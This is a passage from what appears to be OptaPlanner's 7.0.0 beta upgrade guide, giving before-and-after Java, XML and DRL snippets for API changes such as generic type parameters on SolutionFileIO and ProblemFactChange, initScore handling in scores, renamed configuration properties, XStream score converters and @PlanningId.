factory.buildSolver();\nsolver.addEventListener(event -> {\n CloudBalance solution = event.getNewBestSolution();\n ...\n});\n----\n\n\n[.upgrade-recipe-major]\n=== `SolutionFileIO`: added optional generic type parameter\n\nTo avoid the awkward cast to your `Solution` implementation and to get rid of that deprecated interface,\n`SolutionFileIO` now optionally supports a generic type parameter (which is the solution class).\n\nBefore in `*.java`:\n[source, java]\n----\npublic class TspFileIO implements SolutionFileIO {\n ...\n\n public Solution read(File inputSolutionFile) {...}\n\n public void write(Solution solution, File outputSolutionFile) {\n TspSolution tspSolution = (TspSolution) solution;\n ...\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class TspFileIO implements SolutionFileIO<TspSolution> {\n ...\n\n public TspSolution read(File inputSolutionFile) {...}\n\n public void write(TspSolution tspSolution, File outputSolutionFile) {\n ...\n }\n\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== `XStreamSolutionFileIO`: added optional generic type parameter\n\nTo avoid the awkward cast to your `Solution` implementation and to get rid of that deprecated interface,\n`XStreamSolutionFileIO` now optionally supports a generic type parameter (which is the solution class).\n\nBefore in `*.java`:\n[source, java]\n----\nSolutionFileIO solutionFileIO = new XStreamSolutionFileIO(CloudBalance.class);\n----\n\nAfter in `*.java`:\n[source, java]\n----\nSolutionFileIO<CloudBalance> solutionFileIO = new XStreamSolutionFileIO<>(CloudBalance.class);\n----\n\n\n[.upgrade-recipe-minor]\n=== `SelectionFilter`: added generic type parameter\n\nTo avoid the awkward cast to your `Solution` implementation,\na `SelectionFilter` now also has a generic type parameter for the solution, not just the selection type.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class LectureFilter implements SelectionFilter<Lecture> {\n\n public boolean accept(ScoreDirector scoreDirector, Lecture lecture) {\n ...\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class LectureFilter implements SelectionFilter<CourseSchedule, Lecture> {\n\n @Override\n public boolean accept(ScoreDirector<CourseSchedule> scoreDirector, Lecture lecture) {\n ...\n }\n\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== `CustomPhaseCommand`: added optional generic type parameter\n\nTo avoid the awkward cast to your `Solution` implementation and to get rid of that deprecated interface,\n`CustomPhaseCommand` now optionally supports a generic type parameter (which is the solution class).\n\nBefore in `*.java`:\n[source, java]\n----\npublic class DinnerPartySolutionInitializer extends AbstractCustomPhaseCommand {\n\n public void changeWorkingSolution(ScoreDirector scoreDirector) {\n DinnerParty dinnerParty = (DinnerParty) scoreDirector.getWorkingSolution();\n ...\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class DinnerPartySolutionInitializer extends AbstractCustomPhaseCommand<DinnerParty> {\n\n public void changeWorkingSolution(ScoreDirector<DinnerParty> scoreDirector) {\n DinnerParty dinnerParty = scoreDirector.getWorkingSolution();\n ...\n }\n\n}\n----\n\n\n[.upgrade-recipe-major]\n=== `ProblemFactChange`: added optional generic type parameter\n\nTo avoid the awkward cast to your `Solution` implementation and to get rid of that deprecated interface,\n`ProblemFactChange` now optionally supports a generic type parameter (which is the solution class).\n\nBefore in `*.java`:\n[source, java]\n----\n 
solver.addProblemFactChange(new ProblemFactChange() {\n public void doChange(ScoreDirector scoreDirector) {\n CloudBalance cloudBalance = (CloudBalance) scoreDirector.getWorkingSolution();\n ...\n }\n });\n----\n\nAfter in `*.java`:\n[source, java]\n----\n solver.addProblemFactChange(new ProblemFactChange<CloudBalance>() {\n public void doChange(ScoreDirector<CloudBalance> scoreDirector) {\n CloudBalance cloudBalance = scoreDirector.getWorkingSolution();\n ...\n }\n });\n----\n\nAfter in `*.java` (with lambda):\n[source, java]\n----\n solver.addProblemFactChange(scoreDirector -> {\n CloudBalance cloudBalance = scoreDirector.getWorkingSolution();\n ...\n });\n----\n\n\n[.upgrade-recipe-minor]\n=== `Bendable*Score`: `toString()` changed\n\nA bendable score (`BendableScore`, `BendableLongScore` or `BendableBigDecimalScore`)'s `String`\nhas changed so it can be parsed without the ScoreDefinition.\n\nBefore in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <termination>\n <bestScoreLimit>0\/0\/-1\/-2\/-3<\/bestScoreLimit>\n <\/termination>\n----\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <termination>\n <bestScoreLimit>[0\/0]hard\/[-1\/-2\/-3]soft<\/bestScoreLimit>\n <\/termination>\n----\n\nBefore in XStream `*.xml` output with `optaplanner-persistence-xstream`:\n[source, xml]\n----\n <score>0\/0\/-1\/-2\/-3<\/score>\n----\n\nAfter in in XStream `*.xml` output with `optaplanner-persistence-xstream`:\n[source, xml]\n----\n <score>[0\/0]hard\/[-1\/-2\/-3]soft<\/score>\n----\n\n\n[.upgrade-recipe-major]\n=== `EnvironmentMode`: `PRODUCTION` renamed\n\nThe `EnvironmentMode` `PRODUCTION` has been renamed to `NON_REPRODUCIBLE`\nbecause most enterprises use `REPRODUCIBLE` in production and that's fine.\nFor backwards compatibility, `PRODUCTION` still exists, but it's deprecated and it will be removed in a future version.\n\nBefore in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n<solver>\n <environmentMode>PRODUCTION<\/environmentMode>\n ...\n<\/solver>\n----\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n<solver>\n <environmentMode>NON_REPRODUCIBLE<\/environmentMode>\n ...\n<\/solver>\n----\n\n\n[.upgrade-recipe-readme]\n=== Average calculate count renamed to score calculation speed\n\nIn the logs and the benchmark report, the _average calculate count per second_ has been renamed to _score calculation speed_.\n\n\n[.upgrade-recipe-minor]\n=== `Termination`: `calculateCountLimit` renamed\n\nThe termination configuration property `calculateCountLimit` has been renamed to `scoreCalculationCountLimit`.\nThe property `calculateCountLimit` has been deprecated and will be removed in a future version.\n\nBefore in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <termination>\n <calculateCountLimit>100000<\/calculateCountLimit>\n <\/termination>\n----\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <termination>\n <scoreCalculationCountLimit>100000<\/scoreCalculationCountLimit>\n <\/termination>\n----\n\n\n[.upgrade-recipe-minor]\n=== `ProblemStatisticType`: `CALCULATE_COUNT_PER_SECOND` renamed\n\nThe benchmark ProblemStatisticType `CALCULATE_COUNT_PER_SECOND` has been renamed to `SCORE_CALCULATION_SPEED`.\n\nBefore in `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <problemStatisticType>CALCULATE_COUNT_PER_SECOND<\/problemStatisticType>\n----\n\nAfter in `*BenchmarkConfig.xml`:\n[source, xml]\n----\n 
<problemStatisticType>SCORE_CALCULATION_SPEED<\/problemStatisticType>\n----\n\n\n[.upgrade-recipe-readme]\n=== `Score`: uninitialized variable count\n\nA solution's `Score` now also contains the number of uninitialized variables (usually `0`), exposed as a negative number by `getInitScore()`.\nThis is useful in exotic cases with multiple phases to fully initialize a solution.\nIt also prevents bugs in multithreaded use cases.\n\nWith `Score.isSolutionInitialized()`, it's now possible to quickly and reliably determine if a solution is fully initialized.\nThe method `FeasibilityScore.isFeasible()` now also checks if the solution was fully initialized during score calculation.\n
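\nFor example, a minimal sketch (values hypothetical) using the Beta1-era factory method described in the items below:\n[source, java]\n----\n \/\/ A solution with 2 uninitialized variables has an initScore of -2:\n HardSoftScore score = HardSoftScore.valueOf(-2, 0, -10);\n score.getInitScore(); \/\/ -2\n score.isSolutionInitialized(); \/\/ false\n \/\/ Even though the hard score is 0, isFeasible() returns false\n \/\/ because the solution isn't fully initialized:\n score.isFeasible();\n----\n\n\n[.upgrade-recipe-major.upgrade-recipe-reverted]\n=== `EasyScoreCalculator`: `calculateScore()` changed\n\n*This change has been reverted in version 7.0.0.Beta6. Ignore this item if you're upgrading directly to that version or higher.*\n\nThe `EasyScoreCalculator` interface method `calculateScore(solution)` has been changed to `calculateScore(solution, initScore)`.\nChange the method signature to add the `initScore` and then pass it to the `Score.valueOf()` method.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class CloudBalancingEasyScoreCalculator implements EasyScoreCalculator<CloudBalance> {\n\n public HardSoftScore calculateScore(CloudBalance cloudBalance) {\n ...\n return HardSoftScore.valueOf(hardScore, softScore);\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class CloudBalancingEasyScoreCalculator implements EasyScoreCalculator<CloudBalance> {\n\n public HardSoftScore calculateScore(CloudBalance cloudBalance, int initScore) {\n ...\n return HardSoftScore.valueOf(initScore, hardScore, softScore);\n }\n\n}\n----\n\nOptaPlanner keeps track of the `initScore` internally, but it needs to be passed into the `Score` creation because a `Score` is immutable by design.\n\n\n[.upgrade-recipe-minor.upgrade-recipe-reverted]\n=== `IncrementalScoreCalculator`: `calculateScore()` changed\n\n*This change has been reverted in version 7.0.0.Beta6. 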
Ignore this item if you're upgrading directly to that version or higher.\nInstead, the method `valueOfUninitialized(...)` has been added, but that doesn't affect your code.*\n\nEach `Score` implementation now requires an `initScore` parameter.\nInside a `ScoreCalculator`, the `initScore` must be passed from the `calculateScore()` method (see the 2 previous notes above).\n\nOutside of a `ScoreCalculator`, if you're constructing a score for an initialized solution,\njust replace `valueOf()` with `valueOfInitialized()`:\n\nBefore in `*.java`:\n[source, java]\n----\n SimpleScore score = SimpleScore.valueOf(1234);\n----\n\nAfter in `*.java`:\n[source, java]\n----\n SimpleScore score = SimpleScore.valueOfInitialized(1234);\n----\n\nOr with a `HardSoftScore`:\n\nBefore in `*.java`:\n[source, java]\n----\n HardSoftScore score = HardSoftScore.valueOf(1200, 34);\n----\n\nAfter in `*.java`:\n[source, java]\n----\n HardSoftScore score = HardSoftScore.valueOfInitialized(1200, 34);\n----\n\nIt is intentional that `valueOfInitialized()` doesn't just overload `valueOf()`,\nto avoid that an `EasyScoreCalculator` implementation forgets to pass the `initScore` parameter.\n\n\n[.upgrade-recipe-major]\n=== `BestSolutionChangedEvent`: `isNewBestSolutionInitialized()` replaced\n\nThe method `BestSolutionChangedEvent.isNewBestSolutionInitialized()`\nhas been deprecated in favor of `BestSolutionChangedEvent.getNewBestSolution().getScore().isSolutionInitialized()`.\n\nBefore in `*.java`:\n[source, java]\n----\n public void bestSolutionChanged(BestSolutionChangedEvent<CloudBalance> event) {\n if (event.isEveryProblemFactChangeProcessed()\n && event.isNewBestSolutionInitialized()) {\n ...\n }\n }\n----\n\nAfter in `*.java`:\n[source, java]\n----\n public void bestSolutionChanged(BestSolutionChangedEvent<CloudBalance> event) {\n if (event.isEveryProblemFactChangeProcessed()\n && event.getNewBestSolution().getScore().isSolutionInitialized()) {\n ...\n }\n }\n----\n\nHowever, if you also check `isFeasible()`, that's enough because it now also checks if the solution is initialized.\n\nAfter in `*.java` for a `FeasibleScore`:\n[source, java]\n----\n public void bestSolutionChanged(BestSolutionChangedEvent<CloudBalance> event) {\n if (event.isEveryProblemFactChangeProcessed()\n \/\/ isFeasible() checks isSolutionInitialized() too\n && event.getNewBestSolution().getScore().isFeasible()) {\n ...\n }\n }\n----\n\n\n[.upgrade-recipe-minor.upgrade-recipe-reverted]\n=== Custom initializer: `Score.compareTo()` behaviour changed\n\n*This change has been reverted in version 7.0.0.Beta6. 
Ignore this item if you're upgrading directly to that version or higher.*\n\nThe `Score.compareTo()` now also takes the uninitialized variable count into account.\nIf you have a `CustomPhaseCommand` that implements a custom solution initializer (instead of using a Construction Heuristic),\nit will need to transform all scores with `Score.toInitializedScore()` before comparison to avoid making the wrong decision:\n\nBefore in `*.java`:\n[source, java]\n----\npublic class DinnerPartySolutionInitializer extends AbstractCustomPhaseCommand<DinnerParty> {\n ...\n\n private void initializeSeatDesignationList(ScoreDirector<DinnerParty> scoreDirector, DinnerParty dinnerParty) {\n ...\n for (SeatDesignation seatDesignation : dinnerParty.getSeatDesignationList()) {\n Score bestScore = SimpleScore.valueOf(Integer.MIN_VALUE);\n ...\n for (Seat seat : undesignatedSeatList) {\n ...\n if (score.compareTo(bestScore) > 0) {\n bestScore = score;\n ...\n }\n }\n ...\n }\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class DinnerPartySolutionInitializer extends AbstractCustomPhaseCommand<DinnerParty> {\n ...\n\n private void initializeSeatDesignationList(ScoreDirector<DinnerParty> scoreDirector, DinnerParty dinnerParty) {\n ...\n for (SeatDesignation seatDesignation : dinnerParty.getSeatDesignationList()) {\n Score bestScore = SimpleScore.valueOfInitialized(Integer.MIN_VALUE);\n ...\n for (Seat seat : undesignatedSeatList) {\n ...\n if (score.toInitializedScore().compareTo(bestScore.toInitializedScore()) > 0) {\n bestScore = score;\n ...\n }\n }\n ...\n }\n }\n\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== `Score` and `ScoreDefinition`: methods changed\n\nThe `ScoreDefinition.fromLevelNumbers(...)` method now requires an `initScore` parameter.\n\nBefore in `*.java`:\n[source, java]\n----\nScore score = scoreDefinition.fromLevelNumbers(new int[]{0, -200});\n----\n\nAfter in `*.java` (quick and dirty fix):\n[source, java]\n----\nScore score = scoreDefinition.fromLevelNumbers(0, new int[]{0, -200});\n----\n\n\n[.upgrade-recipe-minor]\n=== Custom `Score`: methods added\n\nIf you have a custom `Score`:\nThe `Score` interface has several new methods: `getInitScore()`, `isSolutionInitialized()`, `toInitializedScore()` and `withInitScore()`.\nThe first two methods are implemented by `AbstractScore`, but the last two methods need to be specifically implemented.\n\nBefore in `*.java`:\n[source, java]\n----\npublic final class HardSoftScore extends AbstractScore<HardSoftScore> ... {\n ...\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic final class HardSoftScore extends AbstractScore<HardSoftScore> ... {\n ...\n\n public HardSoftScore toInitializedScore() {\n return initScore == 0 ? 
this : new HardSoftScore(0, hardScore, softScore);\n }\n\n public HardSoftScore withInitScore(int newInitScore) {\n assertNoInitScore();\n return new HardSoftScore(newInitScore, hardScore, softScore);\n }\n\n}\n----\n\nFurthermore, a score that implements `FeasibilityScore` needs to take the `initScore` into account in the `isFeasible()` method implementation.\n\n\n[.upgrade-recipe-minor]\n=== Hibernate integration: extra `@Column` needed\n\nBecause a `Score` now also contains an `initScore` of type `int` (regardless of the type of the other fields),\nadd an extra `@Column` annotation to the beginning of the `@Columns` list to map that field to a database column.\n\nSet it to `0` for all existing records (unless you have reason to believe that some scores weren't calculated on a fully initialized solution).\n\nBefore in `*.java`:\n[source, java]\n----\n @Columns(columns = {\n @Column(name = \"hardScore\"),\n @Column(name = \"softScore\")})\n public HardSoftScore getScore() {\n return score;\n }\n----\n\nAfter in `*.java`:\n[source, java]\n----\n @Columns(columns = {\n @Column(name = \"initScore\"),\n @Column(name = \"hardScore\"),\n @Column(name = \"softScore\")})\n public HardSoftScore getScore() {\n return score;\n }\n----\n\n\n[.upgrade-recipe-impl-detail]\n=== `XStreamSolutionFileIO`: no-arg constructor removed\n\nThe no-arg constructor of `XStreamSolutionFileIO` has been removed because it's useless.\n\n\n[.upgrade-recipe-minor]\n=== JAXB support added\n\nIf you're using JAXB, take advantage of the new JAXB Score bindings etc.\nSee the reference manual, chapter _Integration_.\n\nThese new `ScoreJaxbXmlAdapter` implementations have been promoted to the public API,\nso they are guaranteed to be backwards compatible in future versions.\n
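\nFor example, a minimal sketch (adapter class name assumed from the `optaplanner-persistence-jaxb` module):\n[source, java]\n----\n@PlanningSolution\npublic class CloudBalance {\n\n @PlanningScore\n @XmlJavaTypeAdapter(HardSoftScoreJaxbXmlAdapter.class)\n private HardSoftScore score;\n\n ...\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== Jackson support added\n\nIf you're using Jackson, take advantage of the new Jackson Score bindings etc.\nSee the reference manual, chapter _Integration_.\n\nThese new `ScoreJacksonJsonSerializer` and `ScoreJacksonJsonDeserializer` implementations have been promoted to the public API,\nso they are guaranteed to be backwards compatible in future versions.\n\n\n[.upgrade-recipe-major]\n=== `XStreamScoreConverter` replaced\n\nThe general purpose `XStreamScoreConverter` to bind `Score` implementations\nhas been replaced by specific implementations, such as `HardSoftScoreXStreamConverter` and `SimpleScoreXStreamConverter`,\nthat are easier to use.\n\nFurthermore, these new `ScoreXStreamConverter` implementations have been promoted to the public API,\nso they are now guaranteed to be backwards compatible in future versions.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class CloudBalance {\n\n @XStreamConverter(value = XStreamScoreConverter.class, types = {HardSoftScoreDefinition.class})\n private HardSoftScore score;\n\n ...\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class CloudBalance {\n\n @XStreamConverter(HardSoftScoreXStreamConverter.class)\n private HardSoftScore score;\n\n ...\n}\n----\n\nFor a bendable score, it's no longer needed to configure the `hardLevelSize` and `softLevelSize`.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class Schedule {\n\n @XStreamConverter(value = XStreamScoreConverter.class, types = {BendableScoreDefinition.class}, ints = {1, 2})\n private BendableScore score;\n\n ...\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class Schedule {\n\n @XStreamConverter(BendableScoreXStreamConverter.class)\n private BendableScore score;\n\n 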
...\n}\n----\n\n\n[.upgrade-recipe-major.upgrade-recipe-public-api]\n=== `@CustomShadowVariable`: `sources` type changed\n\nA shadow variable annotated with `@CustomShadowVariable`\nnow expects that the `sources` parameter is of type `@PlanningVariableReference`\ninstead of `@CustomShadowVariable.Source`.\n\nThis way it's consistent with the `variableListenerRef` parameter.\n\nBefore in `*.java`:\n[source, java]\n----\n @CustomShadowVariable(variableListenerClass = ArrivalTimeUpdatingVariableListener.class,\n sources = {@CustomShadowVariable.Source(variableName = \"previousStandstill\")})\n public Long getArrivalTime() {\n return arrivalTime;\n }\n----\n\nAfter in `*.java`:\n[source, java]\n----\n @CustomShadowVariable(variableListenerClass = ArrivalTimeUpdatingVariableListener.class,\n sources = {@PlanningVariableReference(variableName = \"previousStandstill\")})\n public Long getArrivalTime() {\n return arrivalTime;\n }\n----\n\n\n== From 7.0.0.Beta1 to 7.0.0.Beta2\n\n[.upgrade-recipe-minor]\n=== `ProblemFactChange`: `before\/afterProblemFactChanged` renamed\n\nThe `ScoreDirector` methods `beforeProblemFactChanged()` and `afterProblemFactChanged()`\nhave been renamed to `beforeProblemPropertyChanged()` and `afterProblemPropertyChanged()`.\nThis can affect your `ProblemFactChange` implementations.\n\nA problem fact is a class that doesn't change during planning.\nA problem property is a property on a problem fact or a planning entity that doesn't change during planning\n(so it's not a planning variable).\n\nBefore in `*.java`:\n[source, java]\n----\n scoreDirector.beforeProblemFactChanged(computer);\n computer.setMemory(newMemoryCapacity);\n scoreDirector.afterProblemFactChanged(computer);\n----\n\nAfter in `*.java`:\n[source, java]\n----\n scoreDirector.beforeProblemPropertyChanged(computer);\n computer.setMemory(newMemoryCapacity);\n scoreDirector.afterProblemPropertyChanged(computer);\n----\n\n\n[.upgrade-recipe-major]\n=== Solver configuration: `<scoreDefinitionType>` removed\n\nDon't specify the `scoreDefinitionType` in the solver configuration any more\nbecause OptaPlanner will now figure it out automatically from the domain.\n\nBefore in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <scoreDirectorFactory>\n <scoreDefinitionType>HARD_SOFT<\/scoreDefinitionType>\n <scoreDrl>org\/optaplanner\/examples\/cloudbalancing\/solver\/cloudBalancingScoreRules.drl<\/scoreDrl>\n <\/scoreDirectorFactory>\n----\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <scoreDirectorFactory>\n <scoreDrl>org\/optaplanner\/examples\/cloudbalancing\/solver\/cloudBalancingScoreRules.drl<\/scoreDrl>\n <\/scoreDirectorFactory>\n----\n\nFor a bendable score, also move the `bendableHardLevelsSize` and `bendableSoftLevelsSize` lines from the solver configuration XML\ninto the `@PlanningScore` annotation on your domain class.\n\nBefore in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <scoreDirectorFactory>\n <scoreDefinitionType>BENDABLE<\/scoreDefinitionType>\n <bendableHardLevelsSize>1<\/bendableHardLevelsSize>\n <bendableSoftLevelsSize>2<\/bendableSoftLevelsSize>\n <scoreDrl>org\/optaplanner\/examples\/projectjobscheduling\/solver\/projectJobSchedulingScoreRules.drl<\/scoreDrl>\n <\/scoreDirectorFactory>\n----\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <scoreDirectorFactory>\n <scoreDrl>org\/optaplanner\/examples\/projectjobscheduling\/solver\/projectJobSchedulingScoreRules.drl<\/scoreDrl>\n 
<\/scoreDirectorFactory>\n----\n\nBefore in `*.java`:\n[source, java]\n----\n @PlanningScore\n private BendableScore score;\n----\n\nAfter in `*.java`:\n[source, java]\n----\n @PlanningScore(bendableHardLevelsSize = 1, bendableSoftLevelsSize = 2)\n private BendableScore score;\n----\n\nIn the rare case that you're using a custom score, also move its declaration into the domain:\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <scoreDefinitionClass>...MyCustomScoreDefinition<\/scoreDefinitionClass>\n----\n\nAfter in `*.java`:\n[source, java]\n----\n @PlanningScore(scoreDefinitionClass = MyCustomScoreDefinition.class)\n----\n\n[.upgrade-recipe-minor.upgrade-recipe-public-api]\n=== `@PlanningVariable` on primitive types: no longer supported\n\nA `@PlanningVariable` annotation on a primitive type such as `int` or `long` (instead of `Integer` or `Long`)\nnow fails fast instead of causing an inferior result.\nThe use of a primitive type caused the Construction Heuristics to presume the variable is already initialized\n(because it's not null and it might be a form of Repeated Planning),\nwhich led to inferior results.\nIt was hard to diagnose the cause of that issue for many users, so now this inferior approach fails fast with a clear message.\n\nBefore in `*.java`:\n[source, java]\n----\n private int delay;\n\n @PlanningVariable(valueRangeProviderRefs = {\"delayRange\"})\n public int getDelay() {\n return delay;\n }\n\n public void setDelay(int delay) {\n this.delay = delay;\n }\n----\n\nAfter in `*.java`:\n[source, java]\n----\n private Integer delay;\n\n @PlanningVariable(valueRangeProviderRefs = {\"delayRange\"})\n public Integer getDelay() {\n return delay;\n }\n\n public void setDelay(Integer delay) {\n this.delay = delay;\n }\n----\n\n\n[.upgrade-recipe-minor]\n=== `VariableListener` events are no longer unique\n\nOptaPlanner might call the `before...` and `after...` methods on your `VariableListener` implementation\ntwice with the exact same parameters.\nMost `VariableListener` implementations can deal with this,\ngetting a small performance boost because OptaPlanner doesn't have to guarantee uniqueness.\nIf your implementation can't deal with it, then override the `requiresUniqueEntityEvents()` method.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class StartTimeUpdatingVariableListener implements VariableListener<Task> {\n\n ...\n}\n----\n\nAfter in `*.java` (optional):\n[source, java]\n----\npublic class StartTimeUpdatingVariableListener implements VariableListener<Task> {\n\n @Override\n public boolean requiresUniqueEntityEvents() {\n \/\/ If you don't need to override this method, you get a small performance gain\n return true;\n }\n\n ...\n}\n----\n\n\n[.upgrade-recipe-recommended]\n=== Faster and nicer `accumulate()` in `drl`\n\nDrools now uses typed `sum()`, `min()`, `max()` and `avg()` functions in `accumulate()` patterns.\nThis means that a sum of ints is now an int (instead of a double) and a sum of BigDecimals is now a BigDecimal (without rounding errors).\nThis is faster and it also gets rid of the `intValue()` conversions.\n\nMeanwhile, take the opportunity to migrate to the clearer `accumulate` form, if you haven't already.\n\nBefore in `*.drl`:\n[source, drl]\n----\nrule \"requiredCpuPowerTotal\"\n when\n $c : CloudComputer($capacity : cpuPower)\n $total : Number(intValue > $capacity) from accumulate(\n CloudProcess(\n computer == $c,\n $required : requiredCpuPower),\n sum($required)\n )\n then\n 
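\/\/ $total is a Number in this old form, hence the intValue() conversion below\n 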
scoreHolder.addHardConstraintMatch(kcontext, $capacity - $total.intValue());\nend\n----\n\nAfter in `*.drl`:\n[source, drl]\n----\nrule \"requiredCpuPowerTotal\"\n when\n $c : CloudComputer($capacity : cpuPower)\n accumulate(\n CloudProcess(\n computer == $c,\n $required : requiredCpuPower);\n $total : sum($required);\n $total > $capacity\n )\n then\n scoreHolder.addHardConstraintMatch(kcontext, $capacity - $total);\nend\n----\n\nNotice that the pattern, the function list and the DRL constraint list in the `accumulate()`\nshould be separated by a `;` character instead of a `,` character.\n\n\n[.upgrade-recipe-minor]\n=== Custom `Score`: implement `isCompatibleArithmeticArgument()`\n\nAn `AbstractScore` no longer implements the `Score` interface method `isCompatibleArithmeticArgument()` (which is still there).\nNow, your custom `Score` implementation needs to implement it itself.\n\nThis way, `Score` instances can be reused by GWT and other JavaScript-generating code.\n\nBefore in `*.java`:\n[source, java]\n----\npublic final class HardSoftScore extends AbstractScore<HardSoftScore> {\n ...\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic final class HardSoftScore extends AbstractScore<HardSoftScore> {\n ...\n\n @Override\n public boolean isCompatibleArithmeticArgument(Score otherScore) {\n return otherScore instanceof HardSoftScore;\n }\n\n}\n----\n\n\n== From 7.0.0.Beta2 to 7.0.0.Beta3\n\n[.upgrade-recipe-minor]\n=== `Solver.getScoreDirectorFactory`: call `ScoreDirector.dispose()`\n\nEvery `ScoreDirector` needs to be disposed to avoid a potential memory leak.\nThe old docs didn't clearly mention that, so your code might not do that.\n\nBefore in `*.java`:\n[source, java]\n----\nScoreDirectorFactory<CloudBalance> scoreDirectorFactory = solver.getScoreDirectorFactory();\nScoreDirector<CloudBalance> guiScoreDirector = scoreDirectorFactory.buildScoreDirector();\n...\n----\n\nAfter in `*.java`:\n[source, java]\n----\nScoreDirectorFactory<CloudBalance> scoreDirectorFactory = solver.getScoreDirectorFactory();\nScoreDirector<CloudBalance> guiScoreDirector = scoreDirectorFactory.buildScoreDirector();\n...\nguiScoreDirector.dispose();\n----\n\n\n[.upgrade-recipe-minor]\n=== Custom cloning: `PlanningCloneable` replaced\n\nThe interface `PlanningCloneable` has been removed;\nuse a `SolutionCloner` instead.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class NQueens implements PlanningCloneable<NQueens> {\n ...\n\n public NQueens planningClone() {\n ...\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class NQueensSolutionCloner implements SolutionCloner<NQueens> {\n\n @Override\n public NQueens cloneSolution(CloneLedger ledger, NQueens original) {\n ...\n }\n\n}\n----\n\n[source, java]\n----\n@PlanningSolution(solutionCloner = NQueensSolutionCloner.class)\npublic class NQueens {\n ...\n}\n----\n\n\n== From 7.0.0.Beta3 to 7.0.0.Beta4\n\n[.upgrade-recipe-recommended]\n=== Add `@PlanningId` annotation\n\nIt is recommended to add a `@PlanningId` annotation\non the unique ID of every planning entity and on most problem fact classes\n(especially on each class that is a planning value class).\nThe ID must never be null and must be unique per class (no need to be globally unique).\n\nThis enables the use of multithreaded solvers (such as Partitioned Search)\nand makes it easier to implement a real-time planning `ProblemFactChange` by using `ScoreDirector.lookUpWorkingObject()`.\n\nBefore in `*.java`:\n[source, java]\n----\npublic abstract class 
AbstractPersistable ... {\n\n protected Long id; \/\/ Can also be a String, Integer, ...\n\n public Long getId() {\n return id;\n }\n\n ...\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic abstract class AbstractPersistable ... {\n\n protected Long id; \/\/ Can also be a String, Integer, ...\n\n @PlanningId\n public Long getId() {\n return id;\n }\n\n ...\n}\n----\n\nYou can also put the `@PlanningId` annotation on the field instead.\n\n\n[.upgrade-recipe-minor]\n=== `ProblemFactChange`: Use `lookUpWorkingObject()`\n\nUse the new method `ScoreDirector.lookUpWorkingObject(Object)` to translate a planning entity or problem fact\nto its working planning clone more efficiently.\n\nThis requires that the class has a `@PlanningId` annotation on one of its getters or fields.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class EditComputerProblemFactChange implements ProblemFactChange<CloudBalance> {\n\n private final CloudComputer changedComputer;\n ...\n\n public void doChange(ScoreDirector<CloudBalance> scoreDirector) {\n CloudComputer workingComputer = null;\n for (CloudComputer computer : cloudBalance.getComputerList()) {\n if (changedComputer.getId().equals(computer.getId())) {\n workingComputer = computer;\n break;\n }\n }\n\n scoreDirector.beforeProblemPropertyChanged(workingComputer);\n workingComputer.setCpuPower(changedComputer.getCpuPower());\n scoreDirector.afterProblemPropertyChanged(workingComputer);\n ...\n scoreDirector.triggerVariableListeners();\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class EditComputerProblemFactChange implements ProblemFactChange<CloudBalance> {\n\n private final CloudComputer changedComputer;\n ...\n\n public void doChange(ScoreDirector<CloudBalance> scoreDirector) {\n CloudComputer workingComputer = scoreDirector.lookUpWorkingObject(changedComputer);\n\n scoreDirector.beforeProblemPropertyChanged(workingComputer);\n workingComputer.setCpuPower(changedComputer.getCpuPower());\n scoreDirector.afterProblemPropertyChanged(workingComputer);\n ...\n scoreDirector.triggerVariableListeners();\n }\n\n}\n----\n\n\n== From 7.0.0.Beta5 to 7.0.0.Beta6\n\n[.upgrade-recipe-minor]\n=== Benchmarker warms up by default\n\nIt is no longer needed to explicitly configure a warm-up time for the benchmarks.\nThe benchmarker now warms up for 30 seconds by default.\n\nBefore in `*BenchmarkConfig.xml`:\n[source, xml]\n----\n<plannerBenchmark>\n ...\n <warmUpSecondsSpentLimit>30<\/warmUpSecondsSpentLimit>\n ...\n<\/plannerBenchmark>\n----\n\nAfter in `*BenchmarkConfig.xml`:\n[source, xml]\n----\n<plannerBenchmark>\n ...\n<\/plannerBenchmark>\n----\n\nTo disable the warm-up, explicitly set it to 0:\n[source, xml]\n----\n<plannerBenchmark>\n ...\n <warmUpSecondsSpentLimit>0<\/warmUpSecondsSpentLimit>\n ...\n<\/plannerBenchmark>\n----\n\n\n[.upgrade-recipe-minor]\n=== `CustomPhaseCommand`: method 